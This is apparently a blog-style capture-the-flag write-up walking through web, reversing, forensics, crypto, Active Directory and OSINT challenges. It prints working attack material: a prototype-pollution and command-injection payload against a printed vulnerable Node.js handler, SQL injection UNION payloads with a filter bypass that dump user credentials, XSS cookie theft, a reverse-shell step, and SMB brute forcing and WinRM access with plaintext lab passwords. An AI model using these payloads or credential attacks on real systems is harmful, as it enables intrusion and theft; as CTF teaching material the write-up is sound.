A little words to keep us going XD
Do you have what it takes to beat the REST and be the BEST?
Now that is a fun CTF challanges without wasting to much of a time so let jump in already to the fun part solving challanges we are starting with WEB category first.
Easy WEB – 500 Point
Now that we have the target URL let hit it.
Now that is a plain website quickly checking robots.txt and we have nothing we just got the same homepage back to us why not check the source for hint or way to move forrward.
Now that is interesting we can see the Add user with a comment but the most intersting one that caught my eyes was /api?id=source we all love API XD so let check it out.
That is a step forward let see what we have in the source code we just downloaded i will be using my terminal.
Let just get the flag already using Curl .
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ curl -X GET https://cysec-easy-web.herokuapp.com/api --data "id=gimme-flag"
{"message":"CYSEC{eazy_peasy_l3m0n_squeezy}"}
Flag:- CYSEC{eazy_peasy_l3m0n_squeezy}
Breadcrumbs – 1000 Point
A fun one seems like we are stealing a cookie lol let hit the webpage to see what we have.
Seems we have a login page and register page and we have no valid credentials and it was stated already no brute forcing why not get our self a register account yes bro i mean let register XD.
Now that we have an account let log in.
In a dashboard hehehehehe don’t be happy yet it just the normal account i created and seems we have some interesting pages to explore.
The support page seems cool maybe XSS i just don’t know yet but let try using ngrok to see if we can get a hit back to the listener i set up.
Now back to fill the support page.
Let hit the Submit and wait for a hit back and boom i got a hit back but no cookie.
Now that is strange right let try using ngrok web interface which we can always access on http://localhost:4040 if you have ngrok running to inspect traffic.
Waiting for some min and boom we got the cookie now let go claim or flag.
cnVkZWZpc2g6REM4VG1zd1FldG5kZTlSUTZuNjdOS1hGdHg3VUFyTVFOelJ6SnA2ejQ0Z0NGcGpnNVVlRlJBNUN1Q2JWNnRHSHNKdlRk
Now we have our flag but am still curious to know what was encoded in the cookie.
Ahhhh you can’t guess that right.
A quick one seems nc can also get us the cookie.
Flag:- CYSEC{itz__easssssszzzzzzy0876#}
The Examiner – 1000 Point
Seems The Examiner web challange is hosted on THM platform let connect to our VPN to access it.
Deploying and we got our IP not going to waste to much time on using nmap to scan for full ports and we got one only which is port 5000 .
Boom and we landed on a port scanner page let see what we have on the source code.
Now that is the interesting part of the form let try intercepting our request using burp to undertand it more on how it works.
Intercepted and send to repeater now let play with it.
But i got Invalid IP format detected. i have no reason i keep swaping IP and Port but the same error now seems we already have the source code and our craft code i decided to change the Content-Type to application/json back in crafting our command.
Boom and we got it time to get a reverse shell back to our terminal.
Listener ready.
One liner reverse shell payload to execute ready also let hit and we should have a reverse shell back to our terminal.
Now spawning a full TTY shell to make our shell more stable and strong.
Now it ready time for more enumeration.
User Rudefish can run sudo let hit gtfobins.
Running that and we are root time to hunt for the flag.
Getting into root directory seems we have no flag in it but seems we have the .bash_history which store the history of a user command let see what we have in it.
We can see the flag being remove in the .bash_history i try using the find command to see if the flag is hidden elsewhere but no luck so let check what port is running locally.
Seems we have SSH port on which is cool seems we re root we can easily change any user password and have access to it also we can easily change to any user without a password which can be done with su sshuser .
Now we can easily generate a SSH private key for the user sshuser so we can easily access SSH with it.
ssh-keygen -t rsa
We have our private key and also added the authorized_keys now let try to access SSH.
Boom we have the flag and we are done.
Flag:- CYSEC{y0u_scaNNed_ME!}
Doctor Strange – 2000 Point
Man am tired jumping back in.
We have nothing on the source let check for robots.txt .
Ahhhh we have something on the robots.txt let check inpect.js .
const { exec } = require('child_process');
var setData = {
isMalicious: true
};
const run = {
runCommand: (req, res) => {
if (!req.body.inspect) {
return res.status(400).send("Bad request");
} else {
try {
const data = JSON.parse(req.body.inspect);
if (data.cmdToRun) {
const constructUserData = merge(setData, data);
if (setData.isMalicious === false) {
exec(`ping ${data.cmdToRun}`, (error, stdout, stderr) => {
if(error) {
return res.status(500).send(error.message)
} else if(stderr) {
return res.status(500).send(stderr.message);
} else {
return res.status(200).json(stdout)
}
});
} else {
exec(`ping 127.0.0.1`, (error, stdout, stderr) => {
if(error) {
return res.status(500).send(error.message)
} else if(stderr) {
return res.status(500).send(stderr.message);
} else {
return res.status(200).json({message: "Malicious code detected. This is all you get, you hacker", result: stdout})
}
});
}
} else {
return res.status(400).send("What would you like to inspect today?");
}
} catch (e) {
return res.status(400).send(e.message);
}
}
}
};
module.exports = run;
const merge = (target, source) => {
for(var attr in source) {
if (typeof(target[attr]) === "object" && typeof(source[attr]) === "object") {
merge(target[attr], source[attr]);
} else {
target[attr] = source[attr];
}
}
return target;
};
Now that seems more like a javascript prototype pollution it kind of interesting seems we have to pollute setData object at the top here (line 3) to set it to false and POST request with the payload we got.
{"proto": {"isMalicious": false}, "cmdToRun":"<command_injection_payload>">}
Payload ready but seems we are missing the right endpoint let hit dirs brute forcing.
We found a login page but no creds to access it trying some default and sql injection payloads got no luck let check the source page.
Now that is a progress we know it send a POST request to /api/v1/login anytime we try to login seems like more API let try brute forcing the endpoint to avoid missing important part that can help us solve it.
Fire up burp suite and intercept the request changing the rquest method to POST since the API request on POST method now that is funny WTF am typing self XD send to intruder .
Now to payloads to select the wordlist seems medium.txt would work fine i guess.
Now hit on start attack we should get lot of 404 not found error but from my observation the valid dirs have 400 bad request .
A quick note we can also use ffuf i just love burp suite.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ ffuf -c -ic -r -u http://34.205.69.93:8000/api/v1/FUZZ -X POST -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -mc 400
Now that is some useful endpoint let see if i can register an account. Luckily yes i was able to register an account but it was useless unable to get access to the login page with it some back to the inspect.js it should be possible we have inspect endpoint let confirm it.
Back to burp suite with the endpoint and our sweet payload we created.
{"proto": {"isMalicious": false}, "cmdToRun":"<command_injection_payload>"}
{"proto": {"isMalicious": false}, "cmdToRun":"127.0.0.1;id"}
Boom we have command injection.
We can also using curl.
Now let get our flag.
Done and dusted fun right.
Flag:- CYSEC{l3t_the_!njection5_r41n.}
Password Verifier – 500 Point
Now for the reversing part we have no time to waste on it.
Now a quick strings on it.
Now that is quick packed with upx we can easily get the real binary by unpacking it XD.
Now let grep the flag.
That was awesome bro and fast hey you reading you are doing well.
Flag:- CYSEC{easy_easy_easy_rev_rev_rev}
Encore – 500 Point
Forensics not my best part of the challanges i sucks on that part really but giving it my all so i download the jpeg file.
Nothing nothing bruhhhhhhhhh let strings it.
We have something binwalk should do the tricks.
Now that we have a zip file we can easily extract it but seems the same with the present dir we have already.
Interesting more like a stegsnow to me the space and the password is a hint i guess.
Let give it a try bruhhh.
Now that is strange but according to the Cysec Mod @Rudefish.
Ahhh which mean we are done since we have the Password already.
Ancient Languages – 300 Point
We have a wav file let download it to confirm.
Let try Morse Decoder on it first.
Wow that was fast right.
Flag: CYSEC{m0rse_is_0ld_really_0ld}
Happy Song – 1000 Point
Pretty sure not a morse lol why because i try it already no luck.
We always check with strings .
A hint maybe or not but am trying it.
I seriously have no idea of what am doing :sweat_smile: :sweat_smile: .
Here we go again with another hint. seems i will be using https://www.freephototool.com/ so i uploaded the raw file on it set up the width to 1588 and the height to 1570 and boom i got something reflected back.
Boom Boom and we got it.
Flag:- CYSEC{just_b3_HAPPY}
Keep It Simple, Stupid – 5000 Point
Bruhhh i so much love Pwn2Own eh B2R i always state it in all my write up we always start with what nmap enumeration is everything.
Note: You may need to add cysec.local to your hosts file
┌──(root💀Muzec-Security)-[/home/…/CTFPlayground/CysecCTF/cysec/nmap]
└─# echo "54.234.92.201 cysec.local" >> /etc/hosts
Now for the nmap result.
# Nmap 7.91 scan initiated Fri May 13 08:18:52 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p25,445,587,80,3389,389 54.234.92.201
Nmap scan report for cysec.local (54.234.92.201)
Host is up (0.63s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp?
| fingerprint-strings:
| NULL:
|_ 421 Server busy, too many connections
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: IIS Windows Server
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
587/tcp open submission?
| fingerprint-strings:
| NULL:
|_ 421 Server busy, too many connections
|_smtp-commands: Couldn't establish connection on port 587
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CYSEC
| NetBIOS_Domain_Name: CYSEC
| NetBIOS_Computer_Name: EC2AMAZ-E36BFJ9
| DNS_Domain_Name: cysec.local
| DNS_Computer_Name: EC2AMAZ-E36BFJ9.cysec.local
| DNS_Tree_Name: cysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-05-13T10:19:42+00:00
| ssl-cert: Subject: commonName=EC2AMAZ-E36BFJ9.cysec.local
| Not valid before: 2022-02-22T22:23:41
|_Not valid after: 2022-08-24T22:23:41
|_ssl-date: 2022-05-13T10:20:19+00:00; +2h59m55s from scanner time.
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25-TCP:V=7.91%I=7%D=5/13%Time=627E0661%P=x86_64-pc-linux-gnu%r(NULL
SF:,27,"421\x20Server\x20busy,\x20too\x20many\x20connections\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port587-TCP:V=7.91%I=7%D=5/13%Time=627E0661%P=x86_64-pc-linux-gnu%r(NUL
SF:L,27,"421\x20Server\x20busy,\x20too\x20many\x20connections\r\n");
Service Info: Host: EC2AMAZ-E36BFJ9; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h59m54s, deviation: 0s, median: 2h59m54s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-05-13T10:19:41
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 13 08:22:35 2022 -- 1 IP address (1 host up) scanned in 222.69 seconds
Cutting down to the chase already you can check my past write up if you are still lost on how i got the Ports. Now seems we have SMB always go for the low hanging fruit first.
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ smbclient -L //54.234.92.201/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
Seems we have no shares yet possible we need a creds but seems we have HTTP port open let see what we have on the page.
Windows yes bruhh i think you notice already from the nmap scan gosh don’t look down on yourself man you are cool and l33t XD now back to what we are doing seems we have nothing yet on the page brute forcing for hidden dirs and subdomain would be the next step right now let hit it.
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.cysec.local" -u http://cysec.local
Now that is to Fuzz for sub-domain way fast and we found something.
Now you already know what to do right add secret.cysec.local to your /etc/hosts file again.
Just like that let see what we have when we access it.
Now seems we have nothing even after checking the source page let FUZZ the endpoint.
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ ffuf -c -ic -r -u http://secret.cysec.local/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
A quick note we can always add to check for extension with the switch -e txt,php,phtml,bak,old incase to avoid missing some goodies at time.
Now that look promising the Backups.
Now that is a lead forward we have wordlists for both users and passwords .
jhammond
ippsec
pcyber
jmorgan
jsmith
sliberty
eyeager
jbiden
Man i can’t paste the passwords list here it to long i decided to brute force SMB with the wordlists i got using cme you have no idea what is that right it crackmapexec .
crackmapexec smb cysec.local -u users.txt -p passwords.txt
Let it fly and wait wait wait XD.
Now we have creds for SMB let confirm it.
[+] cysec.local\jsmith:Password@123
Shares shares loot loot hehehehehehehe we all love that right now let loot some stuffs first share on my mind is confidential let see what we can loot.
Now that is strange the first time i work on the machine i only found one file which is Email.txt guess it for one of the player so i downloaded Email.txt .
Now let cat it.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ cat Email.txt
From HR Manager <hlevi@cysec.local>,
Good day everyone, I hope this email meets you well.
Due to the amount of delay we encountered during the last self-appraisal week, one of the the IT team members, John Smith, has decide to automate the process. Things should do smoother now.
Thank you and enjoy the rest of your day.
- To all employess.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
Seems it pointing us to jsmith home dirs or should i just call it desktop seems we are working on windows machine XD. Now back to the shares.
Now moving to jsmith home desktop hehehehe it sound lame.
Guess that is what we need let download it.
Now that is a strong password for user hlevi now time to take it to the next level. Let try to scan if we have winrm port open.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ nmap -sC -sV -p 5985 cysec.local
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-16 11:01 WAT
Nmap scan report for cysec.local (54.234.92.201)
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.32 seconds
Now that is confirm we can use the evil-winrm to access the machine with the creds we just got.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ evil-winrm -i cysec.local -u hlevi -p SuperDuperSecurePassword1!
Boom we should be in 3 2 1 .
Now that we are in let to enumerate about our present user hlevi what group is he on maybe any hidden comments.
net users hlevi
Now that look like a password and we still have a user which we are still missing a creds for i guess let try confirming it with cme possible it a jackpot .
Boom that is a big catch let try accessing it with evil-winrm .
We are in and seems our user is in the domain admin group which is a big catch really.
We should be able to access the adminisrator desktop now to get the flag.
Now that is done we have the flag but man am still not happy with that let get access to the administrator account. Let use secretsdump.py to get the the administrator hashes now use PTH to get access to it using evil-winrm .
But when i try it no luck guess only eyeager with the password is the way.
Flag:- CYSEC{itz_all_n1ce&34sy}
IAmBot – 2000 Point
Telegram bot cool let hit it.
Seems we can register and login but we have no creds let register first to know more about what we are dealing with.
I aready have an account let just log in.
Now that is a jwt token let try checking our profile.
Hmmm nothing not that useful let try some injection on the login command.
Dead end to me ahhhh let check some of the commands.
Let try the forgotPassword command with some simple sql injection payloads.
That look strange and kind of interesting getting the alert Hacking attempted detected. This information has been logged and reported to our security team. is it possible it vulnerable to sql injection.
Now that is a error i love seeing. Let dig more and see what we can get.
I was able to get all users username and hashes but not that useful now i think it time to enumerate the number of columns first to avoid being detected there is an easy bypass, which is to replace all whitespaces with /**/ (comments).
/forgotPassword admin'/**/UNION/**/SELECT/**/1# test
/forgotPassword admin'/**/UNION/**/SELECT/**/1,2# test
/forgotPassword admin'/**/UNION/**/SELECT/**/1,2,3# test
Hehehehe no error seems we found the numbers of columns which is 3 now that a lead to move forward. Let confirm the version.
/forgotPassword admin'/**/UNION/**/SELECT/**/@@version,2,3# test
Now let get the database and tables, columns so we can dump everything.
Database command;-
/forgotPassword admin'/**/UNION/**/SELECT/**/concat(schema_name),2,3/**/FROM/**/information_schema.schemata# test
Tables command;-
/forgotPassword admin'/**/UNION/**/SELECT/**/concat(table_name),2,3/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema='chatbot'# test
Columns command;-
/forgotPassword admin'/**/UNION/**/SELECT/**/concat(column_name,","),2,3/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='users'# test
Now for the fun part time to dump all XD.
/forgotPassword admin'/**/UNION/**/SELECT/**/id,username,password/**/FROM/**/chatbot.users/**/LIMIT/**/2# test
Now that settle it we are done.
Flag: CYSEC{sQLi_1s_everyWHERe!}
Hacker Wordle – 2000 Point
Now that would be cool challenge so i download the files but without going to far i got into a issue some missing python modules was missing on my target which required us to download and install python 3.8 now without wasting to much of time we can do all that with the commands below.
wget https://www.python.org/ftp/python/3.8.13/Python-3.8.13.tar.xz
Now just relax we are installing it manually now that we have the archive file let extract it.
tar -xf Python-3.8.13.tar.xz
We should have the archive extracted already in a folder now we can move it.
sudo mv Python-3.8.13 /opt/
Installing all the dependencies required to install Python 3.8. .
sudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libsqlite3-dev libreadline-dev libffi-dev curl libbz2-dev pkg-config make -y
Now let give it time.
cd /opt/Python-3.8.13/
We should run the command below to check if all dependencies are present on our system.
./configure --enable-optimizations --enable-shared
It will optimize the Python binary by running multiple tests now that we have built and configured the environment, it is time to compile it with the command make.
make
Once we have finished building, let install Python binaries as follows:
sudo make altinstall
A quick notice it is advised to use the make altinstall command NOT to overwrite the default Python 3 binary system. after the installation is done we need to configure the dynamic linker run time binding with ldconfig command.
sudo ldconfig /opt/Python-3.8.13
Now let confirm if we have everything ready.
Now installing requirement for the wordle file.
wget https://bootstrap.pypa.io/get-pip.py
Next, install the file downloaded.
python3.8 get-pip.py
Once installed, it is a good idea to check for upgrades.
python3.8 -m pip install --upgrade pip
Checking if pip3.8 was installed.
Now for the requirement.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ cat requirements.txt
coloroma
random
Can easily use pip3.8 install -r requirements.txt to do that now let run the wordle file.
When i strings it i got nothing so i decided to play with it.
Oh only five words cool let play with it.
Boom we got it not going to lie am just guessing here that all.
Flag:- CYSEC{what_a_game_of_wordle!}
Back to Base – 100 Point
Most of the crypto was solve by my litle bro @Abzee you can easily reach him on twitter Abzee now Abzee would be walking you guys through the crypto challenges.
We are using cybechef .
From base64 ---> Reverse
We have the flag.
Flag:- CYSEC{B4se-LXIV}
Still on Bases – 100 Point
Now that look like base32 let give it a try using cyberchef also.
From base32 ---> Reverse
Flag:- CYSEC{B4se-XXXII}
Bella Crypter – 300 Point
Trying it with john the ripper was so slow.
But seems we can see the hash type let try using hashcat which will be more faster.
Setting it up with hashcat .
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt 139 ⨯
hashcat (v6.1.1) starting...
It should take time like time time and boom we should have the cracked hash.
But luckily have done it.
Flag:- CYSEC{bleh}
John Morrison – 500 Point
Let download it.
Seems like a strange one.
We are done.
Flag:- CYSEC-67890-JEDHB29UEYO02UEDDJPH
Squished Silence – 1500 Point
I guess minuscule letters are cute, but now i can’t make sense of this beautiful mess. help me decode it. Looking up minuscule means uppercase and lowercase which is interesting i guess.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ cat rubik.txt
y3llc2vje2nyexrvz3jhcgh5x2nhbl9izv90aglzx2nyyxp5fq==
Let try decoding it online.
By changing it we are getting some interesting stuff hehehehe don’t mind @Abzee using phone to solve challenges l33t right.
As you can see we have gotten cyesec{cryptography We need to continue changing it to upper and lower case till we got the right flag.
Bingo and we have our flag by changing d base64 strings upper and lowercase and a little notice seems the flag format was different pretty sure error from there end.
Flag:- Cyesec{crytography_can_be_this_crazy}
Hackerman – 2000 Point
We’ve recently received reports of a script kiddie who goes by the name detrix01 who goes around hacking into social media accounts using basic techinques. he picks motivation from another hacker. help us find him or them, get us the flag and the predicted country of residence of the hacker.
Open-source intelligence (OSINT) calm down bruh calm down i will be using my best tools Sherlock to Hunt down social media accounts by username across social networks which seems cool with out wasting to much of time let hit it.
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/sherlock/sherlock]
└─$ python3 sherlock.py detrix01
[*] Checking username detrix01 on:
[+] 9GAG: https://www.9gag.com/u/detrix01
[+] AllMyLinks: https://allmylinks.com/detrix01
[+] CNET: https://www.cnet.com/profiles/detrix01/
[+] FortniteTracker: https://fortnitetracker.com/profile/all/detrix01
[+] ICQ: https://icq.im/detrix01/en
[+] Kongregate: https://www.kongregate.com/accounts/detrix01
[+] PCGamer: https://forums.pcgamer.com/members/?username=detrix01
[+] Pinterest: https://www.pinterest.com/detrix01/
[+] Reddit: https://www.reddit.com/user/detrix01
[+] Roblox: https://www.roblox.com/user.aspx?username=detrix01
Now that is a headstart going through all links and we found just one interesting one.
A hint i guess let run sherlock on it also to avoid missing anything.
Now going through all links and https://disqus.com/Albhda stand out let see what we have on the page.
Damn! a version of me from the past was careless.. But who's good with time travel? "Flag is 404"
That is a lead i decided to check it on way back machine .
Hehehehehe awesome let go through some snapshot save bu the way back machine .
Rule 1: no system is safe CYSEC-NG{T1m3-Tr4vle-sur3-Rocks}
Now that was fast seems we are just missing the country only pain pain google searching Albhda and got some result.
I spend time trying italy,rome and bla bla bla but trying latin and boom i got it but does not seems right to me is latin a country XD .
Flag:- CYSEC-NG{T1m3-Tr4vle-sur3-Rocks_Latin}
Bruhhhhh i guess i should stop here XD.
Greeting From Muzec